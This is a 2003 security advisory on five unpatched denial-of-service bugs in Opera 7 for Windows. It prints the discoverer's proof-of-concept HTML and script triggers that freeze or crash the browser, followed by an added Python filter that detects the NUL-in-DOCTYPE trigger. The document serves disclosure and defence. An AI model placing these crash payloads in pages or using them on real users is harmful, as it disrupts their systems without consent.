
Denial of Service in Opera

Reported June 30, 2003, by ::Operash::.



VERSIONS AFFECTED

Opera for Windows, versions 7.11b (build 2887), 7.11 (build 2880), 7.10 (build 2840), and 7.03 (build 2670)

DESCRIPTION

Five new, unfixed bugs in the Opera 7 for Windows web browser can result in a denial-of-service (DoS) condition.

DEMONSTRATION

The discoverer posted the following demonstrations as proof of concept:

2. SAMPLE CODE & IMPACT

=========================

[ CODE 1 ]

Just 12 bytes of data, "<!DOCTYPE" + NULL(\x00) + 1 byte + ">", make
CPU usage go up to 100% (depending on comp specs) and the computer
freezes.

-----------------------------------------------------------------
<!DOCTYPE[\x00]A>
-----------------------------------------------------------------

[ CODE 2 ]

Abnormal termination is caused.

-----------------------------------------------------------------
<form></form><script>document.forms[0].submit()</script>
-----------------------------------------------------------------

[ CODE 3 ]

Abnormal termination is caused.

-----------------------------------------------------------------
<table>
<tr id="crash" style="display:inline"><td>
<script>crash.style.display = "none";</script>
</td></tr>
</table>
-----------------------------------------------------------------

[ CODE 4 ]

Abnormal termination is caused.

-----------------------------------------------------------------
<table>
<map id="crash" style="position:absolute"></map>
<script>crash.style.height = crash.style.width = '0';</script>
</table>
-----------------------------------------------------------------

[ CODE 5 ]

CPU usage goes up to 100% (depending on its specs) and the computer
freezes.

-----------------------------------------------------------------
<html>
<head>
<style type="text/css">
<!--
.aaaaa:after{content:"A";display:block}
.bbbbb{display:run-in}
.ccccc{display:inline-block}
//-->
</style>
</head>
<body>
<div class="aaaaa">
<div class="bbbbb">
<div class="ccccc">
</div>
</div>
</div>
</body>
</html>
-----------------------------------------------------------------
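
With no vendor fix available, a content filter placed in front of affected clients can flag the CODE 1 trigger, a NUL byte inside a DOCTYPE declaration, before the page reaches the browser. The following Python check is an added example, not part of the original advisory; the function name, the 1024-byte search window and the sample bodies are assumptions constructed for illustration.

```python
import re

# Case-insensitive "<!DOCTYPE" opener; HTML treats the keyword case-insensitively.
DOCTYPE_OPEN = re.compile(rb"<!doctype", re.IGNORECASE)
MAX_DECL_LEN = 1024  # assumed cap on how far to look for the closing ">"


def find_nul_in_doctype(body: bytes):
    """Return (offset, declaration_bytes) for each DOCTYPE declaration
    that contains a NUL byte before its closing '>'."""
    findings = []
    for m in DOCTYPE_OPEN.finditer(body):
        start = m.start()
        window = body[start:start + MAX_DECL_LEN]
        end = window.find(b">")
        # Unterminated declaration: inspect the whole window instead.
        decl = window if end == -1 else window[:end + 1]
        if b"\x00" in decl:
            findings.append((start, decl))
    return findings


# Constructed sample bodies (not captured traffic).
SAMPLES = {
    # The 12-byte shape described under CODE 1.
    "code1_pattern": b"<!DOCTYPE\x00A>",
    # Ordinary declaration, no NUL anywhere.
    "benign_html4": b'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"><html></html>',
    # NUL present, but outside the declaration: not flagged by this check.
    "nul_outside_decl": b"<!DOCTYPE html><p>a\x00b</p>",
    # Lower-case keyword, declaration not at offset 0.
    "lowercase_later": b"<html><!doctype\x00x><body></body></html>",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        hits = find_nul_in_doctype(body)
        print(name, "FLAG" if hits else "ok", hits)
```

The check covers only the CODE 1 byte pattern; CODE 2 through CODE 5 depend on script and layout behaviour and are not matched by it.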

VENDOR RESPONSE

Opera was notified on June 24, 2003, but hasn't yet responded to these problems.

CREDIT
Discovered by :: Operash ::.
